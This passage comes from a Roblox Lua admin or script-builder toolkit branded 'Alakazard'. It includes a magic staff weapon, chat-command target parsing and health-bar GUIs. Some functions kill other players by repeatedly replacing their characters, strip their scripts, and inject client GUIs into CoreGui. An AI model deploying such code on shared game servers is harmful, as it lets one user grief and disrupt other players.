  1980. s3=function(t)
  1981. x(function()
  1982. if t.Size.x+t.Size.y+t.Size.z<=20 then
  1983. t.Anchored=false
  1984. end
  1985. if staff:FindFirstChild('ow')or staff:FindFirstChild('wq')then return end
  1986. pa=new('Part')
  1987. debris:AddItem(pa,3)
  1988. pa.Name='ow'
  1989. pa.formFactor=0
  1990. pa.Size=vnew(1,1,1)
  1991. pa.Transparency=1
  1992. pa.CanCollide=false
  1993. pa.Parent=staff
  1994. fire=new('Fire',pa)
  1995. fire.Size=3
  1996. fire.Heat=14
  1997. weld=new('Weld',staff)
  1998. weld.Part0=staff
  1999. weld.Part1=pa
  2000. weld.C0=fnew(0,staff.Size.y/1.3,0)
  2001. clickActive=false
  2002. for i,h in pairs(t.Parent:children())do
  2003. if h:IsA('Humanoid')then
  2004. h:TakeDamage(20)
  2005. if h.Health<=0 then
  2006. ko(h)
  2007. end
  2008. return
  2009. end
  2010. end
  2011. t:BreakJoints()
  2012. clickActive=false
  2013. end)
  2014. end
  2015. --=====================================--
  2016. tool.TextureId='http://www.roblox.com/asset/?id=54353092'
  2017. tool.Activated:connect(function()
  2018. if kayActive==true then return end
  2019. clickActive=true
  2020. mode=mode+1
  2021. if mode==2 then
  2022. a=new('StringValue')
  2023. debris:AddItem(a,1)
  2024. a.Name='toolanim'
  2025. a.Value='Slash'
  2026. a.Parent=tool
  2027. elseif mode==3 then
  2028. s3()
  2029. end
  2030. wait(.3)
  2031. mode=1
  2032. clickActive=false
  2033. end)
  2034. tool.Equipped:connect(function(d)
  2035. pcall(function()staff.CFrame=player.Character['Right Arm'].CFrame end)nPp.CanCollide=false
  2036. nPp.Anchored=true
  2037. new('SpecialMesh',nPp).MeshType='Sphere'
  2038. nPp.Mesh.Scale=vnew(4.5*lw,4.5*lw,4.5*lw)
  2039. nPp.Parent=Pp
  2040. end
  2041. debris:AddItem(Pp,200*.2)
  2042. delay(0,function()
  2043. for RoundNew=1,200 do
  2044. wait(.2)
  2045. if Pp==nil then break end
  2046. pcall(function()
  2047. for yy,X in ipairs(game:service('Players'):GetPlayers())do
  2048. if X~=player then
  2049. pcall(function()
  2050. if (X.Character.Torso.Position-Pp.Position).magnitude<30 then
  2051. for z,humaa in pairs(X.Character:children())do
  2052. if humaa:IsA('Humanoid')then
  2053. pcall(function()
  2054. newSound=new('Sound')
  2055. newSound.Parent=X.Backpack
  2056. end)
  2057. humaa:TakeDamage(5)
  2058. if humaa.Health<=0 then
  2059. ko(humaa)
  2060. end
  2061. end
  2062. end
  2063. end
  2064. end)
  2065. end
  2066. end
  2067. end)
  2068. end
  2069. pcall(function()Pp:remove()end)
  2070. Poisoning=false
  2071. end)
  2072. elseif k=='e'then
  2073. if clickActive==true or kayActive==true then return end
  2074. kayActive=true
  2075. Round=true
  2076. Sp.Enabled=true
  2077. soundnew=new('Sound')
  2078. soundnew.SoundId='rbxasset://sounds/collide.wav'
  2079. soundnew.Pitch=.5
  2080. soundnew.Volume=1
  2081. repeat
  2082. wait(.05)
  2083. pcall(function()
  2084. for ah,Vplayer in ipairs(game:service('Players'):GetPlayers())do
  2085. pcall(function()
  2086. if (Vplayer.Character.Torso.Position-d.Hit.p).magnitude<7 then
  2087. for l,o in pairs(Vplayer.Character:children())do
  2088. if o:IsA('Humanoid')then ko(o)end
  2089. end
  2090. end
  2091. end)
  2092. end
  2093. pcall(function()player.Character.Torso.CFrame=fnew(player.Character.Torso.Position,vnew(d.hit.p.x,0,d.hit.p.z))end)
  2094. Apart=new('Part')
  2095. soundnew:clone().Parent=Apart
  2096. debris:AddItem(Apart,.3)
  2097. Apart.formFactor=0
  2098. Apart.Size=vnew(1,1,1)
  2099. Apart.Transparency=.2
  2100. Apart.CanCollide=true
  2101. --Apart.Anchored=true
  2102. rand=math.random(1,6)
  2103. new('BlockMesh',Apart).Scale=vnew(rand,rand,rand)
  2104. Apart.BrickColor=BrickColor.random()
  2105. Apart.CFrame=rot(math.rad(math.random(-360,360)),math.rad(math.random(-360,360)),math.rad(math.random(-360,360)))+d.Hit.p+vnew(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  2106. Apart.Parent=workspace
  2107. pcall(function()Apart.Sound:play()end)
  2108. pcall(function()Apart.Sound:play()end)
  2109. exp=new('Explosion')
  2110. exp.BlastRadius=6
  2111. exp.Position=Apart.Position
  2112. exp.Parent=Apart
  2113. end)
  2114. until Round==false
  2115. pcall(function()
  2116. soundnew:remove()
  2117. Sp.Enabled=false
  2118. end)
  2119.  
  2120. kayActive=false
  2121. elseif k=='n'then
  2122. if clickActive==true then return end
  2123. kayActive=true
  2124. Smoke.RiseVelocity=20
  2125. x(function()
  2126. if Smoke.Enabled==true then return end
  2127. for i,v in pairs(SmokePart:children())do
  2128. x(function()v.Enabled=true end)
  2129. end
  2130. for b=1,10 do
  2131. wait()
  2132. for i,v in pairs(tool:children())do
  2133. if v==staff then
  2134. v.BrickColor=bcn(1003)
  2135. v.Material=('Slate')
  2136. wait()
  2137. v.Material=('Wood')
  2138. v.BrickColor=bcn('Reddish brown')
  2139. end
  2140. if v~=staff and v~=SmokePart and v~=script then
  2141. v.Material=('Plastic')
  2142. v.Transparency=b/10
  2143. if b==10 then
  2144. v:remove()
  2145. end
  2146. end
  2147. end
  2148. end
  2149. for i,v in pairs(SmokePart:children())do
  2150. x(function()v.Enabled=false end)
  2151. end
  2152. Smoke.RiseVelocity=5
  2153. kayActive=false
  2154. end)
  2155. elseif k=='q'then
  2156. if clickActive==true then return end
  2157. kayActive=true
  2158. x(function()
  2159. if Sp.Enabled==true then return end
  2160. Sp.Enabled=true
  2161. Model=new('Model',player.Character)
  2162. debris:AddItem(Model,30)
  2163. Model.Name='Snare'..random(-999999,999999)
  2164. partnew=new('Part')
  2165. partnew.Anchored=true
  2166. partnew.Shape=0
  2167. partnew.Size=vnew(4,4,4)
  2168. partnew.Material=('Slate')
  2169. partnew.BrickColor=bcn('Bright red')
  2170. partnew.BottomSurface=0
  2171. partnew.TopSurface=0
  2172. partnew.Name='Main'
  2173. partnew.CFrame=fnew(d.Hit.p.x,d.Hit.p.y,d.Hit.p.z)
  2174. partnew.Parent=Model
  2175. for ee=1,6 do
  2176. partlist={}
  2177. for aa=1,14 do
  2178. wait()
  2179. p=new('Part')
  2180. partlist[aa]=p
  2181. p.formFactor=3
  2182. p.CanCollide=false
  2183. p.Size=vnew(2,2,2)
  2184. p.BottomSurface=0
  2185. p.TopSurface=0
  2186. p.Material=('Slate')
  2187. if aa~=1 then
  2188. p.BrickColor=bcn(1003)
  2189. p.Size=Vector3.new(2,2,2/(aa/10))
  2190. end
  2191. p.CFrame=partnew.CFrame
  2192. p.Parent=Model
  2193. if aa==1 then
  2194. w=new('Weld',partnew)
  2195. else
  2196. wq=aa-1
  2197. w=new('Weld',partlist[wq])
  2198. end
  2199. w.Part0=w.Parent
  2200. w.Part1=p
  2201. w.C0=rot(0,0,.25/-aa)+vnew(p.Size.x/2,0,0)
  2202. if aa==2 then
  2203. w.C0=rot(0,ee,.2)+vnew(0,.2,0)
  2204. end
  2205. end
  2206. end
  2207. for i,v in pairs(Model:children())do
  2208. if v:IsA('BasePart')then
  2209. v.Anchored=true
  2210. v:BreakJoints()
  2211. end
  2212. end
  2213. sing('1',partnew)
  2214. Sp.Enabled=false
  2215. kayActive=false
  2216. end)
  2217. end
  2218. end)
  2219. end)
  2220.  
  2221. x(function()mainarm=player.Character['Right Arm']
  2222. weld=new('Weld',mainarm)
  2223. weld.Part0=weld.Parent
  2224. weld.Part1=staff
  2225. weld.C0=rot(-pi/2,0,0)+vnew(0,-1,.55)
  2226. end)
  2227. tool.TextureId='http://www.roblox.com/asset/?id=54353092'
  2228. mode=1
  2229. if z~=nil then return end
  2230. z='asd'
  2231. for i,v in pairs(tool:children())do
  2232. if v~=staff and v~=script then
  2233. v:remove()
  2234. end
  2235. end
  2236. x(function()
  2237. for cc=1,6 do
  2238. for i=1,13 do
  2239. wait''
  2240. if tool.Parent~=player.Character then
  2241. break
  2242. end
  2243. x(function()
  2244. p=new('Part')
  2245. p.Name=i
  2246. p.formFactor=3
  2247. p.CanCollide=false
  2248. p.Size=vnew(.6,.6,.6)
  2249. p.Material=('Slate')
  2250. if i~=1 then
  2251. p.Size=vnew(.52+i/200,.52-i/40,.52-i/40)
  2252. p.BrickColor=bcn(1003)
  2253. end
  2254. p.CFrame=staff.CFrame
  2255. p.Parent=tool
  2256. if i==1 then
  2257. w=new('Weld',staff)
  2258. else
  2259. qn=tool[i-1]
  2260. w=new('Weld',tool[i-1])
  2261. qn.Name='?'
  2262. end
  2263. w.Part0=w.Parent
  2264. w.Part1=p
  2265. if i==1 then
  2266. w.C0=rot(0,-pi/2*cc/1.5,.2)+vnew(0,staff.Size.y/2,0)
  2267. else
  2268. w.C0=rot(0,0,.2)+vnew(p.Size.x/2,0,0)
  2269. end
  2270. end)
  2271. end
  2272. end
  2273. end)
  2274. p=new('Part')
  2275. p.Shape=0
  2276. p.Name='a'
  2277. p.Material=('Slate')
  2278. p.Size=vnew(1,1,1)
  2279. p.CanCollide=false
  2280. p.Parent=tool
  2281. w=new('Weld',staff)
  2282. w.Part0=staff
  2283. w.Part1=p
  2284. w.C0=fnew(0,staff.Size.y/2,0)
  2285.  
  2286. p=new('Part')
  2287. p.Shape=0
  2288. p.Name='Smoke'
  2289. p.Material=('Slate')
  2290. p.BottomSurface=0
  2291. p.TopSurface=0
  2292. p.Size=vnew(1,1,1)
  2293. p.BrickColor=bcn(1003)
  2294. p.CanCollide=false
  2295. p.Parent=tool
  2296. Smoke=new('Smoke',p)
  2297. Smoke.Size=.01
  2298. Smoke.Enabled=false
  2299. Smoke.Color=cnew(0,0,0)
  2300. Smoke.Opacity=1
  2301. Smoke.RiseVelocity=5
  2302. Sp=new('Sparkles')
  2303. Sp.Enabled=false
  2304. Sp.Parent=p
  2305. Sp.Color=cnew(1,0,0)
  2306. w=new('Weld',staff)
  2307. w.Part0=staff
  2308. w.Part1=p
  2309. w.C0=fnew(0,staff.Size.y/1.3,0)
  2310. SmokePart=p
  2311. hagal={}
  2312. for y=1,4 do
  2313. for i=1,20 do
  2314. if tool.Parent~=player.Character then
  2315. break
  2316. end
  2317. p=new('Part')
  2318. hagal[i]=p
  2319. p.formFactor=3
  2320. p.Name='q'
  2321. p.BrickColor=bcn(1003)
  2322. p.Size=vnew(.5,.4,.5)
  2323. p.Material=('Slate')
  2324. p.CanCollide=false
  2325. p.Parent=tool
  2326. if i==1 then
  2327. w=new('Weld',staff)
  2328. else
  2329. w=new('Weld',hagal[i-1])
  2330. end
  2331. w.Part0=w.Parent
  2332. w.Part1=p
  2333. if i==1 then
  2334. w.C0=rot(0,pi/2*y,0)+vnew(0,(staff.Size.y/2)-i*p.Size.y+.2,0)
  2335. elseif i<=10 then
  2336. w.C0=rot(0,pi/2/i,0)+vnew(.05,-p.Size.y/2,0)
  2337. elseif i>10 then
  2338. w.C0=rot(.1,pi/2/i*6,0)+vnew(.03,-p.Size.y,0)
  2339. end
  2340. wait''
  2341. end
  2342. end
  2343. for i,v in pairs(tool:children())do
  2344. if v.Name=='Smoke'then
  2345. v.Touched:connect(function(a)
  2346. x(function()
  2347. if a.Parent~=player.Character and a.Parent~=tool then
  2348. if mode==1 then
  2349. s1(a)
  2350. elseif mode==2 then
  2351. s2(a)
  2352. elseif mode==3 then
  2353. s3(a)
  2354. end
  2355. end
  2356. end)
  2357. end)
  2358. end
  2359. end
  2360. end)
  2361. tool.Unequipped:connect(function()
  2362. if tool.Parent:IsA('Backpack')then
  2363. for i,v in pairs(tool:children())do
  2364. if v~=staff and v~=script then
  2365. v:remove()
  2366. end
  2367. end
  2368. end
  2369. z=nil
  2370. end)
  2371. x(function()
  2372. player.Character.Humanoid.Died:connect(function()if tool.Parent~=player.Character then tool:remove() return end
  2373. if fakestaff~=nil then return end
  2374. fakestaff=new('Model',workspace)
  2375. debris:AddItem(fakestaff,10)
  2376. for i,v in pairs(tool:children())do
  2377. if v~=script then
  2378. v.Parent=fakestaff
  2379. v.Anchored=true
  2380. x(function()v.Smoke.Enabled=true end)
  2381. x(function()v.Sparkles.Enabled=true end)
  2382. end
  2383. end
  2384. sing('2',fakestaff.Smoke)
  2385. fakestaff.Handle:remove()
  2386. fakestaff:BreakJoints()
  2387. tool:remove()
  2388. end)
  2389. end)
  2390. ]],Tool)
  2391. Tool.Parent=par
  2392. Print('Staff added for '..par.Parent.Name..'!')
  2393. end
  2394.  
  2395. hatsmodel=game:GetService('InsertService'):LoadAsset(53684482)
  2396. if hatsmodel~=nil then
  2397. if #hatsmodel:GetChildren()~=0 then
  2398. for i,hats in pairs(hatsmodel:GetChildren())do
  2399. Hats.AlakazardHats[i]=hats:clone()
  2400. hats:remove()
  2401. end
  2402. end
  2403. end
  2404.  
  2405. if game.PlaceId==113456 or game.PlaceId==56786 or game.PlaceId==115207 or game.PlaceId==0 then
  2406. AnaminusBlock={
  2407.  
  2408. ObjectCheck0=function(d)if d:FindFirstChild('DSource')then se.debris:AddItem(d,0)d.archivable=true end end,
  2409.  
  2410. ObjectCheck1=function(d)if d:FindFirstChild('DSource') then d:FindFirstChild('DSource').Value='' end end,
  2411.  
  2412. ObjectCheck2=function(d)if d:FindFirstChild('DSource') then d:FindFirstChild('DSource').Value='' d:remove() end end,
  2413.  
  2414. ObjectCheck3=function(d)if d:FindFirstChild('DSource') and d.className=='Script' then d.Disabled=true d:FindFirstChild('DSource').Value='' wait()d:remove() end end,
  2415.  
  2416. }
  2417. AnaSbCheck1=se.workspace.ChildAdded:connect(function(asd)
  2418. for i,a in pairs(AnaminusBlock)do
  2419. if asd~=nil then
  2420. a(asd)
  2421. end
  2422. end
  2423. end)
  2424. end
  2425.  
  2426. Create=function(fn)table.insert(AlakazardCmds.NewFunctions,X(fn))end
  2427.  
  2428. ChangeClear=function(asdasd,data)
  2429. for _,v in pairs(asdasd:GetChildren())do
  2430. X(function()
  2431. if data:lower()=='name'then
  2432. if string.find(v.Name:lower(),AlakazardCmds.Names.clear:lower())==1 then
  2433. v.arcivable=false
  2434. se.debris:AddItem(v,0)
  2435. ChangeClear(v,'Name')
  2436. end
  2437. elseif data:lower()=='class'then
  2438. if string.find(v.className:lower(),AlakazardCmds.Names.clear:lower())==1 then
  2439. v.arcivable=false
  2440. se.debris:AddItem(v,0)
  2441. ChangeClear(v,'class')
  2442. end
  2443. end
  2444. end)
  2445. end
  2446. end
  2447.  
  2448. Clear=function(o,n)
  2449. if n:lower()=='script'then
  2450. for i,v in pairs(o:GetChildren())do
  2451. X(function()
  2452. X(function()
  2453. if v:IsA('BaseScript')and v.Name~='Animate'then
  2454. if script==nil then
  2455. v.Disabled=true
  2456. v.archivable=false
  2457. se.debris:AddItem(v,0)
  2458. end
  2459. if script~=nil and v~=script then
  2460. v.Disabled=true
  2461. v.archivable=false
  2462. se.debris:AddItem(v,0)
  2463. end
  2464. end
  2465. end)
  2466. X(function()Clear(v,'script')end)
  2467. end)
  2468. end
  2469. elseif n:lower()=='all'then
  2470. for i,v in pairs(o:GetChildren())do
  2471. X(function()
  2472. archivable=false
  2473. se.debris:AddItem(v,.2)
  2474. end)
  2475. X(function()Clear(v,'all')end)
  2476. end
  2477. end
  2478. end
  2479.  
  2480. _HM=function(txt,class,par)
  2481. pcall(function()
  2482. _hm=new(class)
  2483. _hm.Text=txt
  2484. sound=new('Sound',_hm)
  2485. sound.Volume=1
  2486. sound.SoundId='rbxasset://sounds//SWITCH3.wav'
  2487. se.debris:AddItem(_hm,#txt/7)
  2488. Scripting('local',[[text=']]..txt..[[' for i=1,#text do script.Parent.Text='|:| '..text:sub(1,i)..' |:|'pcall(function()script.Parent.Sound:play()end)wait()end]],_hm)
  2489. _hm.Parent=par
  2490. end)
  2491. return _hm
  2492. end
  2493.  
  2494. Adv=function(txt,par,pos1,pos2,pos3,pos4)
  2495. Hint=Guis.Hint.Screen:clone()
  2496. se.debris:AddItem(Hint,#txt/4.5)
  2497. if #txt~=0 then
  2498. newsound=new('Sound')
  2499. newsound.SoundId=Sounds.warning.SoundId
  2500. newsound.Pitch=Sounds.warning.Pitch
  2501. newsound.Volume=Sounds.warning.Volume
  2502. newsound.Looped=Sounds.warning.Looped
  2503. newsound:play()
  2504. newsound.Parent=Hint
  2505. newsound:play()
  2506. end
  2507. Hint.t.Text='|:| '..txt..' |:|'
  2508. Hint.t.Position=unew(pos1,pos2,pos3,pos4)
  2509. Hint.Parent=par
  2510. return Hint
  2511. end
  2512.  
  2513. FixCmds=function(v,p)
  2514. wait()
  2515. i=0
  2516. if scmd(v,'fix')==false then return end
  2517. for asd,c in pairs(Commands)do
  2518. i=i+1
  2519. Actual[p.Name..i]:disconnect()
  2520. end
  2521. for i,c in pairs(Commands)do
  2522. Actual[p.Name..i]=p.Chatted:connect(function(v)
  2523. c(v,p)
  2524. end)
  2525. end
  2526. end
  2527.  
  2528. scmd=function(v,c)
  2529. vl=v:lower()
  2530. cl=c:lower()
  2531. for asd in vl:gmatch('%w+')do
  2532. if asd==cl then
  2533. for i=1,#v do
  2534. if vl:sub(i,i+#cl)==cl..'/' then
  2535. clen=i+#c
  2536. return true
  2537. end
  2538. end
  2539. end
  2540. end
  2541. return false
  2542. end
  2543.  
  2544. Findw=function(wtw,wcommandw,wnumw)
  2545. X(function()
  2546. Q={}
  2547. wtextw=wtw:lower()
  2548. wclw=wcommandw:lower()
  2549. ym=false
  2550. for wlw in string.gmatch(wtextw,'%w+') do
  2551. if ym==true then
  2552. table.insert(Q,wlw)
  2553. end
  2554. if Q[wnumw]~=nil then
  2555. return Q
  2556. end
  2557. if wlw==wclw then
  2558. if wnumw==0 then
  2559. return wlw
  2560. end
  2561. ym=true
  2562. end
  2563. end
  2564. return nil
  2565. end)
  2566. end
  2567.  
  2568. spl=function(name,s)
  2569. if name==nil or s==nil then return{}end
  2570. t={}
  2571. if name:lower()==''then table.insert(t,s)return t end
  2572. if name:lower()=='me'then table.insert(t,s)return t end
  2573. if name:lower()=='admins'then for n,pl in ipairs(se.players:GetPlayers())do if ListCheck(PlayersList.Admins,pl.userId)==true then table.insert(t,pl) end end return t end
  2574. if name:lower()=='noobs'then for n,pl in ipairs(se.players:GetPlayers())do if ListCheck(PlayersList.Admins,pl.userId)~=true then table.insert(t,pl) end end return t end
  2575. if name:lower()=='all'then for n,pl in ipairs(se.players:GetPlayers())do table.insert(t,pl) end return t end
  2576. if name:lower()=='notme'then for n,pl in ipairs(se.players:GetPlayers())do if pl~=s then table.insert(t,pl) end end return t end
  2577. for n,pl in ipairs(se.players:GetPlayers())do if string.find(pl.Name:lower(),name:lower())==1 then table.insert(t,pl)end end
  2578. return t
  2579. end
  2580.  
  2581. CCL=function(p)
  2582. delay(.75,function()
  2583. for i,v in pairs(p.Character.Head:GetChildren())do
  2584. if v.className=='Sound'then
  2585. v.Pitch=0
  2586. se.debris:AddItem(v,.1)
  2587. end
  2588. end
  2589. for i,v in pairs(p.Character:GetChildren())do
  2590. if v:IsA('BaseScript')and v.Name~='Animate'and v.Name~='LocalScript'then
  2591. se.debris:AddItem(v,.1)
  2592. end
  2593. end
  2594. end)
  2595. end
  2596.  
  2597. FakeHead=function(p)
  2598. pcall(function()
  2599. head=p.Character.Head
  2600. fake=head:clone()
  2601. model=new('Model')
  2602. human=new('Humanoid')
  2603.  
  2604. head.Transparency=1
  2605. for i,v in pairs(head:children())do
  2606. if not v:IsA('Weld')and v:IsA('SpecialMesh')then
  2607. v:remove()
  2608. end
  2609. end
  2610.  
  2611. model.Parent=head.Parent
  2612. model.Name=''
  2613.  
  2614. fake.Parent=model
  2615. pcall(function()fake.BrickColor=model.Parent['Body Colors'].HeadColor end)
  2616. weld=new('Weld',model.Parent.Torso)
  2617. weld.Part0=weld.Parent
  2618. weld.Part1=fake
  2619. weld.C0=CFrame.new(0,1.5,0)
  2620.  
  2621. human.Parent=model
  2622. human.Health=0
  2623. human.MaxHealth=0
  2624. end)
  2625. end
  2626.  
  2627. KO_CREATOR=function(user1,user2)
  2628. X(function()
  2629. c=new('ObjectValue')
  2630. c.Value=user1
  2631. c.Name='creator'
  2632. for i,hum in pairs(user2.Character:GetChildren())do
  2633. if hum.className=='Humanoid'then
  2634. c.Parent=hum
  2635. hum.Health=0
  2636. end
  2637. end
  2638. user2.Character:BreakJoints()
  2639. end)
  2640. end
  2641.  
  2642. KO=function(user1,user2)wait()
  2643. X(function()
  2644. PlayersList.Runs.HealthBar[user2.Name]=false
  2645. KOsScriptNew=Scripting('local',[[script.Parent=workspace
  2646. Player1=']]..user1.Name..[['
  2647. Player2=']]..user2.Name..[['
  2648. repeat
  2649. wait(.05)
  2650. if pcall(function()
  2651. Ala1=game.Players[Player1]
  2652. Ala2=game.Players[Player2]
  2653. ko=Instance.new('ObjectValue')
  2654. ko.Name='creator'
  2655. ko.Value=Ala1
  2656. m=Instance.new('Model')
  2657. game:service('Debris'):AddItem(m,.2)
  2658. m.Name=Player2
  2659. h=Instance.new('Humanoid',m)
  2660. ko.Parent=h
  2661. Ala2.Character=m
  2662. Ala2.Character.Parent=workspace
  2663. end)then
  2664. else
  2665. script:remove()
  2666. end
  2667. until asd~=nil
  2668.  
  2669. ]],user1.PlayerGui)
  2670. table.insert(PlayersList.KOs,KOsScriptNew)
  2671. end)
  2672. end
  2673.  
  2674. LoadGuisHere=function()
  2675. Guis.HealthBar[1]=new('ScreenGui')
  2676. Guis.HealthBar[1].Name=[[==Alakazard's Health Guis==]]
  2677. Guis.HealthBar[2]=Instance.new('Frame',Guis.HealthBar[1])
  2678. Guis.HealthBar[2].Name='base'
  2679. Guis.HealthBar[2].Position=UDim2.new(0.400000000,0,0.94000000,0)
  2680. Guis.HealthBar[2].Size=UDim2.new(0.200000000,0,0.059000000,0)
  2681. Guis.HealthBar[2].Style=('RobloxSquare')
  2682. Guis.HealthBar[3]=Instance.new('Frame',Guis.HealthBar[2])
  2683. Guis.HealthBar[3].Name='Health_1'
  2684. Guis.HealthBar[3].Size=UDim2.new(0.9000000000,0,0.5,0)
  2685. Guis.HealthBar[3].BackgroundTransparency=.8
  2686. Guis.HealthBar[3].BackgroundColor3=Color3.new(128,0,0)
  2687. Guis.HealthBar[4]=Instance.new('Frame',Guis.HealthBar[3])
  2688. Guis.HealthBar[4].Name='Health'
  2689. Guis.HealthBar[4].Size=UDim2.new(1,0,1,0)
  2690. Guis.HealthBar[4].BackgroundTransparency=.8
  2691. Guis.HealthBar[4].BackgroundColor3=Color3.new(0,255,0)
  2692. Guis.HealthBar[5]=Instance.new('TextLabel',Guis.HealthBar[3])
  2693. Guis.HealthBar[5].Name='hp'
  2694. Guis.HealthBar[5].Position=UDim2.new(.5,0,.5,0)
  2695. Guis.HealthBar[5].TextColor3=Color3.new(255,255,255)
  2696. Guis.HealthBar[5].Text='Alakazard; Pending...'
  2697. Guis.HealthBar[6]=Instance.new('Frame',Guis.HealthBar[2])
  2698. Guis.HealthBar[6].Name='Health_2'
  2699. Guis.HealthBar[6].Size=UDim2.new(0.9000000000,0,0.5,0)
  2700. Guis.HealthBar[6].Position=UDim2.new(0,0,.55,0)
  2701. Guis.HealthBar[6].BackgroundTransparency=.8
  2702. Guis.HealthBar[6].BackgroundColor3=Color3.new(128,0,0)
  2703. Guis.HealthBar[7]=Instance.new('Frame',Guis.HealthBar[6])
  2704. Guis.HealthBar[7].Name='Health'
  2705. Guis.HealthBar[7].Size=UDim2.new(1,0,1,0)
  2706. Guis.HealthBar[7].BackgroundTransparency=.8
  2707. Guis.HealthBar[7].BackgroundColor3=Color3.new(255,255,0)
  2708. Guis.HealthBar[8]=Instance.new('TextLabel',Guis.HealthBar[6])
  2709. Guis.HealthBar[8].Name='hp'
  2710. Guis.HealthBar[8].Position=UDim2.new(.5,0,.5,0)
  2711. Guis.HealthBar[8].TextColor3=Color3.new(255,255,255)
  2712. Guis.HealthBar[8].Text='Alakazard; Pending...'
  2713. Guis.HealthBar[9]=Scripting('local',[[print'load']],Guis.HealthBar[1])
  2714. Guis.HealthBar[10]=Instance.new('ImageLabel')
  2715. Guis.HealthBar[10].Name=[[(|:. Alakazard's Symbol .:|)]]
  2716. Guis.HealthBar[10].Position=UDim2.new(.9,0,0,0)
  2717. Guis.HealthBar[10].Parent=Guis.HealthBar[2]
  2718. Guis.HealthBar[10].Size=UDim2.new(.1,0,1.1,0)
  2719. Guis.HealthBar[10].Image=id..'47965745'
  2720. Guis.HealthBar[10].BackgroundTransparency=1
  2721. Guis.Hint.Screen=new('ScreenGui')
  2722. Guis.Hint.Screen.Name='NewHint'
  2723. Guis.Hint.TextGui=new('TextButton',Guis.Hint.Screen)
  2724. Guis.Hint.TextGui.Name='t'
  2725. Guis.Hint.TextGui.Style=('RobloxButton')
  2726. Guis.Hint.TextGui.TextColor3=Color3.new(1,1,1)
  2727. Guis.Hint.TextGui.AutoButtonColor=false
  2728. Guis.Hint.TextGui.FontSize=('Size10')
  2729. Guis.Hint.TextGui.Size=UDim2.new(1,0,.05,0)
  2730. Guis.Hint.TextGui.TextWrap=true
  2731. end
  2732.  
  2733. SoundsLoad=function()
  2734. X(function()
  2735. for n,s in pairs(se.lighting:GetChildren())do
  2736. for sn in pairs(Sounds)do
  2737. if s.Name==sn then
  2738. s:remove()
  2739. end
  2740. end
  2741. end
  2742. for i in pairs(Sounds)do
  2743. newsound=new('Sound')
  2744. newsound.Name=i
  2745. newsound.SoundId=Sounds[i].SoundId
  2746. newsound.Pitch=0
  2747. newsound.Volume=0
  2748. newsound.Looped=true
  2749. newsound.Parent=se.lighting
  2750. newsound:play()
  2751. end
  2752. end)
  2753. end
  2754.  
  2755. LoadGuis=function(p)
  2756. if ListCheck(PlayersList.Admins,p.userId)==true then
  2757. X(function()
  2758. ShowCommands(p)
  2759. p.ChildAdded:connect(function(child)
  2760. if child:IsA('PlayerGui')then
  2761. ShowCommands(p)
  2762. end
  2763. end)
  2764. end)
  2765. end
  2766. X(function()
  2767. X(function()wait(1)
  2768. X(function()
  2769. for i,v in pairs(p:children())do
  2770. if v:IsA('PlayerGui')then
  2771. for a,w in pairs(v:children())do
  2772. if w.Name=='HealthGUI'then
  2773. w:remove()
  2774. end
  2775. end
  2776. end
  2777. end
  2778. end)
  2779. X(function()
  2780. if ListCheck(PlayersList.Creator,p.userId)==true then
  2781. delay(4,function()pcall(function()p.Character.Head.face:remove()end)end)
  2782. delay(4,function()pcall(function()p.Character.Head.BrickColor=bcn(1003)end)end)
  2783. if p.Character~=nil then
  2784. X(function()
  2785. for wqw,hatw in pairs(Hats.AlakazardHats)do
  2786. hatw:clone().Parent=p.Character
  2787. end
  2788. end)
  2789. end
  2790. end
  2791. end)
  2792. X(function()
  2793. if PlayersList.Runs.HealthBar[p.Name]==false then return end
  2794. for i,pg in pairs(p:GetChildren())do
  2795. if pg.className=='PlayerGui'then
  2796. for asdwasd,pgg in pairs(pg:GetChildren())do
  2797. if pgg.Name=='HealthGUI'and pgg.className=='GuiMain'or pgg.Name==[[==Alakazard's Health Guis==]]then
  2798. pgg:remove()
  2799. end
  2800. end
  2801. return nil
  2802. end
  2803. end
  2804. end)
  2805. end)
  2806. end)
  2807. end
  2808. JJump=function(p)
  2809. X(function()wait(1)
  2810. for i,v in pairs(p:children())do
  2811. if v.className=='PlayerGui'then
  2812. for k,a in pairs(v:children())do
  2813. if a.Name=='Jump'then a:remove()end
  2814. end
  2815. asdscript=Scripting('local',[[
  2816. p=script.Parent.Parent
  2817. p.Character.Humanoid.Jumping:connect(function()
  2818. if asd~=nil then return end
  2819. asd='not nil'
  2820. p.Character.Torso.Velocity=Vector3.new(p.Character.Torso.Velocity.x*1.6,100,p.Character.Torso.Velocity.z*1.6)
  2821. wait(1)
  2822. asd=nil
  2823. end)
  2824. ]],nil)
  2825. asdscript.Name='Jump'
  2826. asdscript.Parent=v
  2827. return
  2828. end
  2829. end
  2830. end)
  2831. end
  2832. --[[======================================================================]]--
  2833. --[[======================================================================]]--
  2834. --[[======================================================================]]--
  2835. --[[======================================================================]]--
  2836. --[[======================================================================]]--
  2837. --[[======================================================================]]--
  2838. --[[======================================================================]]--
  2839. --[[======================================================================]]--
  2840. PlayerFunctions={
  2841.  
  2842. HealthBar=function(p)
  2843. if ListCheck(PlayersList.Runs.HealthBar,p.Name)==true then return end
  2844. PlayersList.Runs.HealthBar[p.Name]=true
  2845. delay(1,function()
  2846. Scripting('local',[==[
  2847. --Alakazard
  2848. if game.CreatorId==14072171 then script:remove()return end
  2849. player=game.Players.LocalPlayer
  2850. new=Instance.new
  2851. unew=UDim2.new
  2852. cnew=Color3.new
  2853.  
  2854. Alakazard='Alakazard; '
  2855.  
  2856. life=function(obj,time)
  2857. game:service('Debris'):AddItem(obj,time)
  2858. end
  2859.  
  2860. life(game:FindFirstChild('Alakazard'..'\39'..'s Health Gui ('..player.Name..')',true),0)
  2861.  
  2862. script.Name='ALAKAZARD HEALTH GUI SCRIPT'
  2863.  
  2864. screen=new('ScreenGui',game.CoreGui)
  2865. screen.Name='Alakazard'..'\39'..'s Health Gui ('..player.Name..')'
  2866.  
  2867. script.Parent=screen
  2868.  
  2869. main=new('Frame',screen)
  2870. main.Position=unew(.2,0,.95,0)
  2871. main.Size=unew(.6,0,.05,0)
  2872. main.BackgroundColor3=cnew(128,0,0)
  2873. main.BackgroundTransparency=.7
  2874. main.BorderColor3=cnew(0,0,0)
  2875.  
  2876. frame=new('ImageLabel',main)
  2877. frame.Size=unew(1,0,1,0)
  2878. frame.Image='rbxassetid://54639434'
  2879. frame.BackgroundColor3=cnew(0,128,0)
  2880. frame.BackgroundTransparency=.5
  2881. frame.BorderSizePixel=0
  2882. frame.BorderColor3=cnew(0,0,0)
  2883.  
  2884. health=new('TextLabel',main)
